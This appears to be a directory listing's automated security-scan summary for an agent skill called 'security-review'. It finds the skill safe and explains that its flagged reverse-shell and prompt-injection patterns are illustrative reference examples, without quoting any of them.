The Agent Skills Directory

[SAFE]: The skill consists of instructional content and reference documentation aimed at facilitating security audits. All identified risks are part of educational examples intended to assist the agent in identifying vulnerabilities.
[COMMAND_EXECUTION]: The skill's configuration allows the use of powerful tools such as Bash and Task. These are utilized by the agent for legitimate auditing tasks (e.g., searching directories). The skill itself contains no malicious shell commands or unauthorized system modifications.
[CREDENTIALS_UNSAFE]: The documentation provides guidance on identifying hardcoded secrets as high-severity vulnerabilities. No actual credentials or sensitive tokens are hardcoded within the skill's own files.
[PROMPT_INJECTION]: The skill does not contain any instructions designed to bypass agent safety filters or override core behaviors. It includes documentation on prompt injection to enable the agent to detect such attacks in the code it reviews.
[REMOTE_CODE_EXECUTION]: Automated alerts regarding reverse shell patterns and obfuscated code were determined to be false positives. These patterns appear strictly as illustrative 'Malicious Package Indicators' within the reference documentation (references/supply-chain.md).

security-review